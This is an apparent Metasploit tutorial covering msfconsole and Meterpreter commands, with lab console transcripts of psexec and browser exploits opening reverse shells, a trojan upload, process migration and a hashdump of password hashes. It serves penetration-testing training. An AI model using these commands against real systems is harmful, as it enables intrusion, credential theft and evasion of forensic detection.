Running the 'irb' command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the Framework.
msf > irb
[*] Starting IRB shell...
>> puts "Hello, metasploit!"
Hello, metasploit!
>> Framework::Version
=> "3.3-dev"
>> framework.modules.keys.length
=> 744

The jobs Command

Jobs are modules that are running in the background. The 'jobs' command provides the ability to list and terminate these jobs.
msf exploit(ms08_067_netapi) > jobs -h
Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-k Terminate the specified job name.
-l List all running jobs.

The load Command

The 'load' command loads a plugin from Metasploit's 'plugin' directory. Arguments are passed as 'key=val' on the shell.
msf > load
Usage: load [var=val var=val ...]
Load a plugin from the supplied path. The optional
var=val options are custom parameters that can be
passed to plugins.
msf > load pcap_log
[*] Successfully loaded plugin: pcap_log

"unload" Command
Conversely, the 'unload' command unloads a previously loaded plugin and removes
any extended commands.
msf > load pcap_log
[*] Successfully loaded plugin: pcap_log
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.

"loadpath" Command
The 'loadpath' command will load a third-party module tree from the given path, so you can point Metasploit at your own 0-day exploits, encoders, payloads, etc.
msf > loadpath /home/secret/modules
Loaded 0 modules.

The resource Command

Some attacks such as Karmetasploit use a resource (batch) file that you can load through the msfconsole using the 'resource' command. These files provide basic scripting for msfconsole: the commands in the file are run in sequence. Later on we will discuss how, outside of Karmetasploit, that can be very useful.
msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated
plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1

...snip...

Batch files can greatly speed up testing and development times as well as allow the
user to automate many tasks. Besides loading a batch file from within msfconsole,
they can also be passed at startup using the '-r' flag. The simple example below
creates a batch file to display the Metasploit version number at startup.
root@bt4-pre:/pentest/exploits/framework3# echo version > version.rc
root@bt4-pre:/pentest/exploits/framework3# ./msfconsole -r version.rc
=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 155 aux
resource> version
Framework: 3.3-dev.6055
Console : 3.3-dev.6476

msf >

The route Command

The "route" command in Metasploit allows you to route sockets through a session or 'comm', providing basic pivoting capabilities. To add a route, you pass the target subnet and network mask followed by the session (comm) number.
msf exploit(ms08_067_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
Route traffic destined to a given subnet through a supplied session.
The default comm is Local.
msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 2
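To make the pivoting semantics of 'route add', 'route get' and 'route print' concrete, here is an added example in Ruby, the framework's own language; it is a model written for this page, not Metasploit's code. Each route maps a subnet/netmask to a session number, a destination resolves to the most specific matching route, and anything unmatched goes out via the Local comm, as the console's help text says; the class name and the longest-prefix rule are assumptions of this model.

```ruby
require 'ipaddr'

# Added example, not Metasploit's own code: a small model of the msfconsole
# 'route' table. Each entry maps a subnet/netmask to the session ('comm')
# whose tunnel carries the traffic; anything matching no route uses the
# Local comm, as the console's own help text states.
class PivotRouteTable
  Route = Struct.new(:subnet, :netmask, :comm)

  def initialize
    @routes = []
  end

  # route add <subnet> <netmask> <session-id>
  def add(subnet, netmask, comm)
    net = IPAddr.new(subnet).mask(netmask)
    @routes << Route.new(net, netmask, comm.to_i)
    self
  end

  # route remove <subnet> <netmask> <session-id>
  def remove(subnet, netmask, comm)
    net = IPAddr.new(subnet).mask(netmask)
    @routes.reject! { |r| r.subnet == net && r.netmask == netmask && r.comm == comm.to_i }
    self
  end

  # route flush
  def flush
    @routes.clear
    self
  end

  # route get <address>: which comm carries a packet to this destination?
  # The most specific (longest-prefix) matching route wins; no match => 'Local'.
  # Assumed tie-break rule for this model.
  def get(address)
    ip = IPAddr.new(address)
    best = @routes.select { |r| r.subnet.include?(ip) }
                  .max_by { |r| prefix_length(r.netmask) }
    best ? "Session #{best.comm}" : 'Local'
  end

  # route print: the same layout as the console's "Active Routing Table".
  def print_table
    lines = ['Active Routing Table', '====================',
             format('%-16s %-16s %s', 'Subnet', 'Netmask', 'Gateway'),
             format('%-16s %-16s %s', '------', '-------', '-------')]
    @routes.each do |r|
      lines << format('%-16s %-16s Session %d', r.subnet.to_s, r.netmask, r.comm)
    end
    lines.join("\n")
  end

  private

  # Number of one-bits in a dotted-quad netmask, e.g. 255.255.255.0 => 24.
  def prefix_length(netmask)
    IPAddr.new(netmask).to_i.to_s(2).count('1')
  end
end

if $PROGRAM_NAME == __FILE__
  table = PivotRouteTable.new.add('192.168.1.0', '255.255.255.0', 2)
  puts table.print_table
  puts "192.168.1.50 -> #{table.get('192.168.1.50')}" # Session 2
  puts "10.0.0.5     -> #{table.get('10.0.0.5')}"     # Local
end
```

From the defender's side the same table says which internal subnets would be reached only through the compromised host, which is where that host's outbound connections to otherwise unrelated internal addresses become the thing to look for in flow logs.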

The info Command

The 'info' command will provide detailed information about a particular module including all options, targets, and other information. Be sure to always read the module description prior to using it as some may have undesired effects.
The info command also provides the following information:
The author and licensing information
Vulnerability references (ie: CVE, BID, etc)
Any payload restrictions the module may have
msf > info dos/windows/smb/ms09_001_write
Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
Version: 6890
License: Metasploit Framework License (BSD)
Provided by:
j.v.vallejo

The set/unset Commands

The 'set' command allows you to configure Framework options and parameters for the current module you are working with.
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 yes The target address
RPORT 445 yes Set the SMB service port

A recently added feature in Metasploit is the ability to set an encoder to use at runtime.
This is particularly useful in exploit development when you aren't quite certain
as to which payload encoding methods will work with an exploit.
msf exploit(ms08_067_netapi) > show encoders
Compatible encoders
===================
Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
mipsle/longxor XOR Encoder
php/base64 PHP Base64 encoder
ppc/longxor PPC LongXOR Encoder
ppc/longxor_tag PPC LongXOR Encoder
sparc/longxor_tag SPARC DWORD XOR Encoder
x64/xor XOR Encoder
x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower Avoid UTF8/tolower
x86/call4_dword_xor Call+4 Dword XOR Encoder
x86/countdown Single-byte XOR Countdown Encoder
x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha Non-Alpha Encoder
x86/nonupper Non-Upper Encoder
x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

"unset" Command
The opposite of the 'set' command, of course, is 'unset'. 'Unset' removes a parameter
previously configured with 'set'. You can remove all assigned variables with 'unset
all'.
msf > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > set THREADS 50
THREADS => 50
msf > set

Global
======
Name Value
---- -----
RHOSTS 192.168.1.0/24
THREADS 50
msf > unset THREADS
Unsetting THREADS...
msf > unset all
Flushing datastore...
msf > set
Global
======
No entries in data store.

The sessions Command

The 'sessions' command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.
msf > sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-d Detach an interactive session
-h Help banner.
-i Interact with the supplied session identifier.
-k Terminate session.
-l List all active sessions.
-q Quiet mode.
-v List verbose fields.
To list any active sessions, pass the '-l' options to 'sessions'.
msf exploit(3proxy) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.101:33191 -> 192.168.1.104:4444

To interact with a given session, you just need to use the '-i' switch followed by the Id
number of the session.
msf exploit(3proxy) > sessions -i 1
[*] Starting interaction with 1...
C:\WINDOWS\system32>

The search Command

The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for you can search for it via 'search'. In the output below, a search is being made for MS Bulletin MS09-001. The search function will locate this string within the module names, descriptions, references, etc.
Note the naming convention for Metasploit modules uses underscores versus hyphens.
msf > search ms09-001
[*] Searching loaded modules for pattern 'ms09-001'...

Auxiliary
=========
Name Description
---- -----------
dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset

The show Command

Entering 'show' at the msfconsole prompt will display every module within Metasploit.
msf > show
Encoders
========
Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
...snip...

There are a number of 'show' commands you can use but the ones you will use most
frequently are 'show auxiliary', 'show exploits', 'show payloads', 'show encoders', and
'show nops'.
Executing 'show auxiliary' will display a listing of all of the available auxiliary modules
within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of
service modules, fuzzers, and more.
msf > show auxiliary
Auxiliary
=========
Name Description
---- -----------
admin/backupexec/dump Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry Veritas Backup Exec Server Registry Access
admin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized Administrative Access
...snip...

Naturally, 'show exploits' will be the command you are most interested in running
since at its core, Metasploit is all about exploitation. Run 'show exploits' to get a
listing of all exploits contained in the framework.
msf > show exploits
Exploits
========
Name Description
---- -----------
aix/rpc_ttdbserverd_realpath ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow
...snip...

Running 'show payloads' will display all of the different payloads for all platforms
available within Metasploit.
msf > show payloads
Payloads
========
Name Description
---- -----------
aix/ppc/shell_bind_tcp AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port AIX Command Shell, Find Port Inline
aix/ppc/shell_reverse_tcp AIX Command Shell, Reverse TCP Inline
...snip...

As you can see, there are a lot of payloads available. Fortunately, when you are in
the context of a particular exploit, running 'show payloads' will only display the
payloads that are compatible with that particular exploit. For instance, if it is a
Windows exploit, you will not be shown the Linux payloads.
msf exploit(ms08_067_netapi) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX or Win7)
...snip...

If you have selected a specific module, you can issue the 'show options' command to
display which settings are available and/or required for that specific module.
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting

If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
...snip...

If you wish the further fine-tune an exploit, you can see more advanced options by
running 'show advanced'.
msf exploit(ms08_067_netapi) > show advanced
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port
...snip...

Running 'show encoders' will display a listing of the encoders that are available
within MSF.
msf > show encoders
Encoders
========
Name Description
---- -----------
cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
mipsle/longxor XOR Encoder
php/base64 PHP Base64 encoder
ppc/longxor PPC LongXOR Encoder
ppc/longxor_tag PPC LongXOR Encoder
sparc/longxor_tag SPARC DWORD XOR Encoder
x64/xor XOR Encoder
x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower Avoid UTF8/tolower
x86/call4_dword_xor Call+4 Dword XOR Encoder
x86/countdown Single-byte XOR Countdown Encoder
x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive Jump/Call XOR Additive Feedback Encoder
x86/nonalpha Non-Alpha Encoder
x86/nonupper Non-Upper Encoder
x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder

Lastly, issuing the 'show nops' command will display the NOP Generators that
Metasploit has to offer.
msf > show nops
NOP Generators
==============
Name Description
---- -----------
armle/simple Simple
php/generic PHP Nop Generator
ppc/simple Simple
sparc/random SPARC NOP generator
tty/generic TTY Nop Generator
x64/simple Simple
x86/opty2 Opty2
x86/single_byte Single Byte

The setg Command

In order to save a lot of typing during a pentest, you can set global variables within
msfconsole. You can do this with the 'setg' command. Once these have been set,
you can use them in as many exploits and auxiliary modules as you like. You can
also save them for use the next time you start msfconsole. However, the pitfall is
forgetting you have saved globals, so always check your options before you "run" or
"exploit". Conversely, you can use the "unsetg" command to unset a global
variable. In the examples that follow, variables are entered in all-caps (i.e. LHOST),
but Metasploit is case-insensitive so it is not necessary to do so.
msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136

After setting your different variables, you can run the 'save' command to save your
current environment and settings. With your settings saved, they will be
automatically loaded on startup which saves you from having to set everything again.
msf > save
Saved configuration to: /root/.msf3/config
msf >

The use Command
When you have decided on a particular module to make use of, issue the 'use'
command to select it. The 'use' command changes your context to a specific module,
exposing type-specific commands. Notice in the output below that any global
variables that were previously set are already configured.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
msf auxiliary(ms09_001_write) >

Metasploit Exploits
All exploits in the Metasploit Framework will fall into two categories: active and
passive.
Active Exploits
Active exploits will exploit a specific host, run until completion, and then exit.
Brute-force modules will exit when a shell opens from the victim.
Module execution stops if an error is encountered.
You can force an active module to the background by passing '-j' to the exploit
command:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >

Active Exploit Example
The following example makes use of a previously acquired set of credentials to
exploit and gain a reverse shell on the target system.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Passive Exploits
Passive exploits wait for incoming hosts and exploit them as they connect.
Passive exploits almost always focus on clients such as web browsers, FTP
clients, etc.
They can also be used in conjunction with email exploits, waiting for
connections.
Passive exploits report shells as they happen; they can be enumerated by passing
'-l' to the sessions command. Passing '-i' will interact with a shell.
msf exploit(ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.101:52647 -> 192.168.1.104:4444
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

Passive Exploit Example
The following output shows the setup to exploit the animated cursor vulnerability.
The exploit does not fire until a victim browses to our malicious website.
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.104:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.104:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>

Using Exploits
Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to
msfconsole.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > help
...snip...
Exploit Commands
================
Command Description
------- -----------
check Check to see if a target is vulnerable
exploit Launch an exploit attempt
rcheck Reloads the module and checks if the target is vulnerable
rexploit Reloads the module and launches an exploit attempt
msf exploit(ms08_067_netapi) >

Using an exploit also adds more options to the 'show' command.
msf exploit(ms03_026_dcom) > show targets
Exploit targets:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
...snip...
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.120 yes The target address
RPORT 135 yes The target port
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > show advanced
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port
...snip...
msf exploit(ms03_026_dcom) > show evasion
Module evasion options:
Name : DCERPC::fake_bind_multi
Current Setting: true
Description : Use multi-context bind calls
...snip...

Metasploit Payloads
There are three different types of payload modules in Metasploit: Singles,
Stagers, and Stages. These different types allow for a great deal of versatility and
can be useful across numerous types of scenarios. Whether or not a payload is
staged is represented by a '/' in the payload name. For example,
"windows/shell_bind_tcp" is a single payload with no stage, whereas
"windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).
Singles
Singles are payloads that are self-contained and completely standalone. A Single
payload can be something as simple as adding a user to the target system or
running calc.exe.
Stagers
Stagers set up a network connection between the attacker and victim and are
designed to be small and reliable. It is difficult to always do both of these well, so the
result is multiple similar stagers. Metasploit will use the best one when it can and fall
back to a less-preferred one when necessary.
Windows NX vs NO-NX Stagers
Reliability issue for NX CPUs and DEP
NX stagers are bigger (VirtualAlloc)
Default is now NX + Win7 compatible
Stages
Stages are payload components that are downloaded by stager modules. The
various payload stages provide advanced features with no size limits, such as
Meterpreter, VNC Injection, and the iPhone 'ipwn' Shell.
Payload stages automatically use 'middle stagers'
A single recv() fails with large payloads
The stager receives the middle stager
The middle stager then performs a full download
Also better for RWX
Payload Types
Metasploit contains many different types of payloads, each serving a unique role
within the framework. Let's take a brief look at the various types of payloads
available and get an idea of when each type should be used.

Inline (Non Staged)
A single payload containing the exploit and full shell code for the selected
task. Inline payloads are by design more stable than their counterparts
because they contain everything all in one. However, some exploits won't
support the resulting size of these payloads.

Staged
Stager payloads work in conjunction with stage payloads in order to perform a
specific task. A stager establishes a communication channel between the
attacker and the victim and reads in a stage payload to execute on the remote
host.
Meterpreter
Meterpreter, the short form of Meta-Interpreter is an advanced, multi-faceted
payload that operates via dll injection. The Meterpreter resides completely in
the memory of the remote host and leaves no traces on the hard drive,
making it very difficult to detect with conventional forensic techniques. Scripts
and plugins can be loaded and unloaded dynamically as required and
Meterpreter development is very strong and constantly evolving.
PassiveX
PassiveX is a payload that can help in circumventing restrictive outbound
firewalls. It does this by using an ActiveX control to create a hidden instance
of Internet Explorer. Using the new ActiveX control, it communicates with the
attacker via HTTP requests and responses.
NoNX
The NX (No eXecute) bit is a feature built into some CPUs to prevent code
from executing in certain areas of memory. In Windows, NX is implemented
as Data Execution Prevention (DEP). The Metasploit NoNX payloads are
designed to circumvent DEP.
Ord
Ordinal payloads are Windows stager-based payloads that have distinct
advantages and disadvantages. The advantage is that they work on every
flavor and language of Windows dating back to Windows 9x without the
explicit definition of a return address, and they are also extremely tiny. However,
two very specific disadvantages make them not the default choice. The first is
that they rely on ws2_32.dll being loaded in the process being
exploited before exploitation. The second is that they are a bit less stable than
the other stagers.

IPv6
The Metasploit IPv6 payloads, as the name indicates, are built to function
over IPv6 networks.
Reflective DLL injection
Reflective DLL Injection is a technique whereby a stage payload is injected
into a compromised host process running in memory, never touching the host
hard drive. The VNC and Meterpreter payloads both make use of reflective
DLL injection. You can read more about this from Stephen Fewer, the creator
of the reflective DLL injection method.

Metasploit Generating Payloads
During exploit development, you will most certainly need to generate shellcode to
use in your exploit. In Metasploit, payloads can be generated from within the
msfconsole. When you 'use' a certain payload, Metasploit adds the 'generate'
command.
msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > help
...snip...
Payload Commands
================
Command Description
------- -----------
generate Generates a payload
msf payload(bind_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-b The list of characters to avoid: '\x00\xff'
-e The name of the encoder module to use.
-f The output file name (otherwise stdout)
-h Help banner.
-o A comma separated list of options in VAR=VAL format.
-s NOP sled length.
-t The output type: ruby, perl, c, or raw.

To generate shellcode without any options, simply execute the 'generate' command.
msf payload(bind_tcp) > generate
# windows/shell/bind_tcp - 298 bytes (stage 1)
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444, RHOST=
buf =
...snip...

About the Metasploit Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory
DLL injection stagers and is extended over the network at runtime. It communicates
over the stager socket and provides a comprehensive client-side Ruby API. It
features command history, tab completion, channels, and more. Meterpreter was
originally written by skape for Metasploit 2.x, common extensions were merged for
3.x and it is currently undergoing an overhaul for Metasploit 3.3. The server portion is
implemented in plain C and is now compiled with MSVC, making it somewhat
portable. The client can be written in any language but Metasploit has a full-featured
Ruby client API.
How Meterpreter Works
The target executes the initial stager. This is usually one of bind, reverse,
findtag, passivex, etc.
The stager loads the DLL prefixed with Reflective. The Reflective stub
handles the loading/injection of the DLL.
The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and
sends a GET. Metasploit receives this GET and configures the client.
Lastly, Meterpreter loads extensions. It will always load stdapi and will load
priv if the module gives administrative rights. All of these extensions are
loaded over TLS/1.0 using a TLV protocol.
Meterpreter Design Goals
"Stealthy"
Meterpreter resides entirely in memory and writes nothing to disk.
No new processes are created as Meterpreter injects itself into the
compromised process and can migrate to other running processes easily.
By default, Meterpreter uses encrypted communications.
All of these provide limited forensic evidence and impact on the victim
machine.
"Powerful"
Meterpreter utilizes a channelized communication system.
The TLV protocol has few limitations.
"Extensible"
Features can be augmented at runtime and are loaded over the network.
New features can be added to Meterpreter without having to rebuild it.

Adding Runtime Features

New features are added to Meterpreter by loading extensions.
The client uploads the DLL over the socket.
The server running on the victim loads the DLL in-memory and initializes it.
The new extension registers itself with the server.
The client on the attacker's machine loads the local extension API and can
now call the extension's functions.
This entire process is seamless and takes approximately 1 second to complete.

Metasploit Meterpreter Basics

Since the Meterpreter provides a whole new environment, we will cover some of the
basic Meterpreter commands to get you started and help you get familiar with this
most powerful tool. Throughout this course, almost every available Meterpreter
command is covered. For those that aren't covered, experimentation is the key to
successful learning.

help
The 'help' command, as may be expected, displays the
Meterpreter help menu.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
...snip...

background
The 'background' command will send the current Meterpreter session
to the background and return you to the msf prompt. To get back to your Meterpreter
session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
288 snmp.exe C:\WINDOWS\System32\snmp.exe
...snip...

migrate
Using the 'migrate' post module, you can migrate to another process on the
victim.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

ls
As in Linux, the 'ls' command will list the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data
...snip...

download
The 'download' command downloads a file from the remote machine.
Note the use of the double-slashes when giving the Windows path.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

upload
As with the 'download' command, you need to use double-slashes with the
'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

ipconfig
The 'ipconfig' command displays the network interfaces and addresses on
the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0
meterpreter >

getuid
Running 'getuid' will display the user that the Meterpreter server is running as
on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

execute
The 'execute' command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

shell
The 'shell' command will present you with a standard shell on the target
system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

idletime
Running 'idletime' will display the number of seconds that the user at the
remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

hashdump
The 'hashdump' post module will dump the contents of the SAM
database.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >
